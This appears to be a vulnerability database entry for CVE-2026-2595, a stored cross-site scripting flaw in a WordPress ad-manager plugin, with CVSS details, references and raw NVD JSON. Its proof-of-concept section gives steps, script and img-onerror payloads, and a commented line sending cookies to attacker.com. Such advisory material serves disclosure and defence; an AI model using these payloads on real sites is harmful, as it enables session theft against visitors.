Security Vulnerability Report
CVE-2026-2595 CVSS 5.4 MEDIUM

CVE-2026-2595

Published: 2026-03-28 12:16:04
Last Modified: 2026-04-24 16:36:24

Description

The Quads Ads Manager for Google AdSense plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 2.0.98.1 due to insufficient input sanitization and output escaping of multiple ad metadata parameters. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.

CVSS Details

CVSS Score
5.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Quads Ads Manager for Google AdSense <= 2.0.98.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
HTML
<!-- PoC for CVE-2026-2595
     Target: Quads Ads Manager for Google AdSense <= 2.0.98.1
     Type: Stored XSS -->
<!-- Step 1: Log in as a user with Contributor privileges. -->
<!-- Step 2: Navigate to Quads -> Ads -> Add New. -->
<!-- Step 3: Insert the following payload into the 'Ad Title' or metadata field. -->
<script>
  // Malicious payload to steal cookies or demonstrate execution
  alert('CVE-2026-2595 Stored XSS Executed!');
  // fetch('https://attacker.com/steal?c=' + document.cookie);
</script>
<!-- Alternatively, using an SVG or image tag if script tags are stripped by a WAF (if any) -->
<img src=x onerror=alert('XSS')>

References

https://plugins.trac.wordpress.org/changeset/3467744/quick-adsense-reloaded
https://www.wordfence.com/threat-intel/vulnerabilities/id/99051b12-5a24-4108-9ea4-81f37a1c1b35?source=cve

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-2595", "sourceIdentifier": "[email protected]", "published": "2026-03-28T12:16:03.850", "lastModified": "2026-04-24T16:36:24.067", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Quads Ads Manager for Google AdSense plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 2.0.98.1 due to insufficient input sanitization and output escaping of multiple ad metadata parameters. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page."}, {"lang": "es", "value": "El plugin Quads Ads Manager para Google AdSense para WordPress es vulnerable a cross-site scripting almacenado en versiones hasta la 2.0.98.1, inclusive, debido a una sanitización de entrada y un escape de salida insuficientes de múltiples parámetros de metadatos de anuncios. Esto permite a atacantes autenticados, con acceso de nivel Colaborador o superior, inyectar scripts web arbitrarios en páginas que se ejecutarán cada vez que un usuario acceda a una página inyectada."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/changeset/3467744/quick-adsense-reloaded", "source": "[email protected]"}, {"url": 
"https://www.wordfence.com/threat-intel/vulnerabilities/id/99051b12-5a24-4108-9ea4-81f37a1c1b35?source=cve", "source": "[email protected]"}]}}